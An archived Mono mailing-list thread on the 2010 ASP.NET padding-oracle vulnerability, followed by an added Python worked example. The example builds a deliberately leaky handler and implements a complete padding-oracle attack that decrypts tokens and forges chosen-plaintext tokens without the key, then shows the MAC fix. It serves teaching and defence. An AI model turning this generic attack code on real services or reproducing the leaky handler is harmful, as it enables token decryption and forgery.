Based on code inspection it looks to me like Mono is partially vulnerable. There are/were two basic problems with the MS implementation:
1) When an incorrect string is passed in the 'd' parameter to WebResource.axd, which is processed by System.Web.Handlers.WebResourceHandler.ProcessRequest, the exception that is thrown depends on whether the padding in the decrypted string is correct or not. This is the padding oracle that lets an attacker encrypt (or decrypt) arbitrary strings with the key used by the oracle. Mono's implementation appears to also have this problem in both WebResourceHandler and ScriptResourceHandler. The fix for this is to include a MAC as part of the request string.

2) Given an encrypted string representing a file, ScriptResource.axd, which is processed by System.Web.Handlers.ScriptResourceHandler.ProcessRequest, allows for the download of arbitrary files from within the application's Virtual Path. Mono's implementation doesn't appear to allow for anything other than embedded resources to be downloaded through this path and so isn't vulnerable.

Dan Witt

On Fri, Oct 1, 2010 at 2:07 PM, Sebastien Pouliot <sebastien.poul...@gmail.com> wrote:
> My previous answer still stands. Watch the following link for updates:
> http://www.mono-project.com/Vulnerabilities
>
> On Fri, 2010-10-01 at 12:52 +0200, Tomi wrote:
> > Any update on this issue? The MS patch is already out. Some background
> > information:
> > http://blogs.technet.com/b/srd/archive/2010/09/17/understanding-the-asp-net-vulnerability.aspx
> > http://weblogs.asp.net/scottgu/archive/2010/09/30/asp-net-security-fix-now-on-windows-update.aspx
> >
> > On 19 September 2010 11:47, Tomi <bosak.to...@gmail.com> wrote:
> > > Hi folks,
> > >
> > > is mono also affected by this security vulnerability? (ScottGu: "This
> > > vulnerability is in our ASP.NET implementation (and will be fixed in a
> > > patch). I'm not sure if Mono has the same bug.")
> > > http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx
> >
> > _______________________________________________
> > Mono-devel-list mailing list
> > Mono-devel-list@lists.ximian.com
> > http://lists.ximian.com/mailman/listinfo/mono-devel-list
>
> _______________________________________________
> Mono-devel-list mailing list
> Mono-devel-list@lists.ximian.com
> http://lists.ximian.com/mailman/listinfo/mono-devel-list
_______________________________________________
Mono-devel-list mailing list
Mono-devel-list@lists.ximian.com
http://lists.ximian.com/mailman/listinfo/mono-devel-list
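Editor's worked example, added to this archived thread and not code from Mono, Microsoft or any poster: it models problem 1) above (a handler whose failure mode reveals whether CBC padding was valid), shows how that single bit lets an attacker both decrypt an existing token and forge a token for a chosen plaintext without the key (the "encrypt (or decrypt) arbitrary strings" point, going one step beyond the text by carrying out the forgery), and then shows the MAC fix the message proposes. Everything here is an assumption for illustration: the block cipher is a toy 16-byte Feistel network built on HMAC-SHA256 so the file runs on the standard library alone (the attack relies only on CBC structure, so it applies unchanged to AES); `KEY`, `MAC_KEY`, `KNOWN`, `vulnerable_handler` and `hardened_handler` are stand-ins for the real machine key and for WebResourceHandler-style request handling, with the distinguishable failures modelled as different exception types.

```python
# Added example, not Mono or Microsoft code: the padding oracle described above,
# the decrypt/forge attack it enables, and the MAC fix.  Toy Feistel block cipher
# (HMAC-SHA256 rounds); the attack relies on nothing but CBC structure.
import hashlib, hmac

BLOCK = 16
KEY = b"demo-cbc-key"      # assumption: stands in for the server's machine key
MAC_KEY = b"demo-mac-key"  # assumption: separate key for the HMAC in the fix
KNOWN = {b"WebForms.js"}   # assumption: the only resource the handler serves

class PaddingError(Exception): pass
class ResourceError(Exception): pass
class TokenError(Exception): pass

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def feistel(key, b, rounds):  # encrypt with range(4), decrypt with range(3, -1, -1)
    l, r = b[:8], b[8:]
    for i in rounds:  # round function: first 8 bytes of HMAC(key, i || r)
        l, r = r, _xor(l, hmac.new(key, bytes([i]) + r, hashlib.sha256).digest()[:8])
    return r + l

def pad(data):  # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise PaddingError
    return data[:-n]

def cbc_encrypt(key, iv, pt):
    out = [iv]
    for i in range(0, len(pt), BLOCK):
        out.append(feistel(key, _xor(pt[i:i + BLOCK], out[-1]), range(4)))
    return b"".join(out[1:])

def _cbc_unchain(dec, iv, ct):  # CBC decryption given any block-decrypt function
    c = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return b"".join(_xor(dec(c[i]), c[i - 1]) for i in range(1, len(c)))

def cbc_decrypt(key, iv, ct):
    return _cbc_unchain(lambda b: feistel(key, b, range(3, -1, -1)), iv, ct)

def vulnerable_handler(token):  # token = IV || ciphertext, like the 'd' value
    # The flaw: bad padding and an unknown resource raise different exceptions.
    name = unpad(cbc_decrypt(KEY, token[:BLOCK], token[BLOCK:]))
    if name not in KNOWN:
        raise ResourceError
    return name

def outcome(handler, token):  # what a client can observe: a name or an error class
    try:
        return handler(token)
    except Exception as e:
        return type(e).__name__

def padding_oracle(iv, block):  # the attacker's one bit: was the padding valid?
    return outcome(vulnerable_handler, iv + block) != "PaddingError"

def recover_intermediate(oracle, block):  # learn D_k(block) one byte at a time
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padval = BLOCK - pos
        prev = bytearray(inter[j] ^ padval if j > pos else 0 for j in range(BLOCK))
        for guess in range(256):
            prev[pos] = guess
            ok = oracle(bytes(prev), block)
            if ok and pos == BLOCK - 1:  # rule out a longer pad that is valid by chance
                alt = bytes(prev[:pos - 1]) + bytes([prev[pos - 1] ^ 0xFF, guess])
                ok = oracle(alt, block)
            if ok:
                inter[pos] = guess ^ padval
                break
        else:
            raise RuntimeError("no guess accepted; is this really a padding oracle?")
    return bytes(inter)

def oracle_decrypt(oracle, iv, ct):  # cbc_decrypt's chaining, with D_k from the oracle
    return unpad(_cbc_unchain(lambda b: recover_intermediate(oracle, b), iv, ct))

def oracle_encrypt(oracle, plaintext):  # CBC-R: forge IV || ciphertext without the key
    pt, chain = pad(plaintext), [b"\x00" * BLOCK]  # any last block will do
    for i in range(len(pt) - BLOCK, -1, -BLOCK):  # work backwards to the IV
        chain.insert(0, _xor(recover_intermediate(oracle, chain[0]), pt[i:i + BLOCK]))
    return chain[0], b"".join(chain[1:])

def seal(plaintext, iv):  # the fix: encrypt-then-MAC over IV || ciphertext
    ct = cbc_encrypt(KEY, iv, pad(plaintext))
    return iv + ct + hmac.new(MAC_KEY, iv + ct, hashlib.sha256).digest()

def hardened_handler(token):  # MAC checked first, in constant time; one error for all
    body, tag = token[:-32], token[-32:]
    want = hmac.new(MAC_KEY, body, hashlib.sha256).digest()
    if len(body) >= 2 * BLOCK and len(body) % BLOCK == 0 and hmac.compare_digest(want, tag):
        try:
            name = unpad(cbc_decrypt(KEY, body[:BLOCK], body[BLOCK:]))
            if name in KNOWN:
                return name
        except PaddingError:  # unreachable for an authentic token; same error anyway
            pass
    raise TokenError
```

`oracle_decrypt` is `cbc_decrypt` with the keyed block decryption swapped for `recover_intermediate`: the oracle is, in effect, a decryption service for single blocks, which is why it also yields forgeries (`oracle_encrypt` walks the chain backwards, picking the last ciphertext block freely and solving each earlier block so the XOR lands on the chosen plaintext). In `hardened_handler` the order matters: the MAC is verified with `hmac.compare_digest` before any decryption or unpadding, and every failure, including the short-token and length checks, collapses into the same `TokenError`, so a client flipping bytes sees one outcome and has no bit to work with.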